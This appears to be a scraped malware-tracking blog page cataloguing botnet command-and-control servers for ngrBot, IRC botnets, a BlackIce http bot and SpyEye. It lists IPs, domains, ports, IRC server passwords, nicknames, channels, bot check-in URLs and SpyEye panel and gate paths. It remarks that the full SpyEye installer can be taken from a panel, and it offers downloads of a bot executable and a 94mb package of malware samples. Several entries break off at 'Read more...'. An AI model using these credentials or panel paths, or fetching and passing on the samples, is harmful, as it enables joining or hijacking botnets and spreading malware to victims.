blackicejoker.no-ip.biz 193.107.17.47 Download URLs http://193.107.17.47/VertexNet/tasks.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804} (blackicejoker.no-ip.biz) http://193.107.17.47/VertexNet/adduser.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804}&lan=10.1.8.2&cmpname=DELL-D3E62F7E26%20[Administrator]&country=Deutsch%20(Deutschland)%20+49&cc=DE&idle=9376&ver=v1.2 (blackicejoker.no-ip.biz) hosting infos: http://whois.domaintools.com/193.107.17.47
193.107.16.114(ngrBot hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number 193.107.16.114 1863 PASS ngrBot 199.15.234.7 80 65.110.60.20 80 NICK n{US|XPa}tuoheyk USER tuoheyk 0 0 :tuoheyk JOIN #rjr RjR PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) – Redirected 4 domain(s) hosting infos: http://whois.domaintools.com/193.107.16.114
jayian.com(irc botnet hosted in United States Kenmore Sentris Network Llc)
Resolved : [jayian.com] To [76.191.112.53] Remote Host Port Number 76.191.112.53 1866 NICK n[USA|XP|COMPUTERNAME]qfilxzg USER hh “” “lol” :hh JOIN #!h! PONG 422 Now talking in #!h! Topic On: [ #!h! ] [ ] Topic By: [ xx ] UPDATE: Remote Host Port Number 199.15.234.7 80 69.163.148.162 80 76.191.112.53 2087 PASS carmex PRIVMSG #!s! :[DNS]: BlockedRead more...
xxlaa.com(ngrBot hosted in Russian Federation Selectel Ltd)
My estimation for this botnet size is 30-50k aproximatly Domains used to control bots: xxlaa.com active Sabukenke.com not active Alufina.com not activ xxlss.com not active xxlcc.com not active Resolved : [xxlaa.com] To [31.186.102.170] C&C Server: 222.187.221.243:7777 PASS laekin0505x Server Password: Username: ynuvlog Nickname: n{DE|XPa}ynuvlog Channel: (Password: ) Channeltopic: C&C Server: 31.186.102.170:7777 PASS laekin0505x Server Password:Read more...
188.138.84.90(ngrBot hosted in Germany Intergenia Ag)
Remote Host Port Number 188.138.84.90 9996 PASS .. 199.15.234.7 80 NICK n{US|XPa}ehftjhj USER ehftjhj 0 0 :ehftjhj PONG :34405528 JOIN #Bots ngrBot PRIVMSG #Bots :[HTTP]: Updated HTTP spread message to “http://www.twom-pc.com” Now talking in #Bots Topic On: [ #Bots ] [ !http.set http://www.twom-pc.com ] Topic By: [ Juicers2 ] Modes On: [ #Bots ] [Read more...
elperro23.net(ngrBot hosted in United States Seattle Dme Hosting Llc)
Domains used to control bots: elperro23.net elperro3.net Resolved : [elperro23.net] To [74.221.210.169] Remote Host Port Number 199.15.234.7 80 217.160.124.219 80 74.221.210.169 5236 PASS ROCKR PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :)” PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 20 domain(s)Read more...
BlackIce Server(http Bot hosted in Germany Gunzenhausen Hetzner Online Ag)
Bot Panel exe file Download Download exe connects here keto.w2c.ru 92.241.169.250 http://92.241.169.250/index.php?action=add&a=7&u=———&l=&p=———&c=DELL-D3E62F7E26 (keto.w2c.ru) hosting infos: http://whois.domaintools.com/92.241.169.250
paradoxnet.ru(SpyEye v1.3 hosted in Ukraine Lugansk Fop Opria Ruslan Dmitrievich)
Now alot of idiots are using spyeye here is the example SpyEye Panels http://sna.paradoxnet.ru/spy/gate.php http://paradoxnet.ru/spy/gate.php SpyEye Directory Back-connect server SpyEye Collector v0.3.9 SpyEye Collector v0.3.9 configuration file SpyEye Collector v0.3.9 sql tables Formgraber panel SpyEye Gate Installer Picture1 Picture2 SpyEye Control Panel u can also have the full SpyEye installer from this panel the problemRead more...
lookshit.info(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Resolved : [lookshit.info] To [80.82.65.96] Remote Host Port Number 80.82.65.96 65485 PASS biology Local users: Current Local Users: 390 Max: 418 Global users: Current Global Users: 390 Max: 418 USER bot 0 * : Merqy[UserName@COMPUTERNAME] NICK [wXP|EN|53124|M] JOIN #Merqy s3xy 89 bots inside JOIN #Merqy.EN s3xy 37 bots inside hosting infos: http://whois.domaintools.com/80.82.65.96
94mb malware samples
This package have alot of irc bots,bankers,spreaders etc Download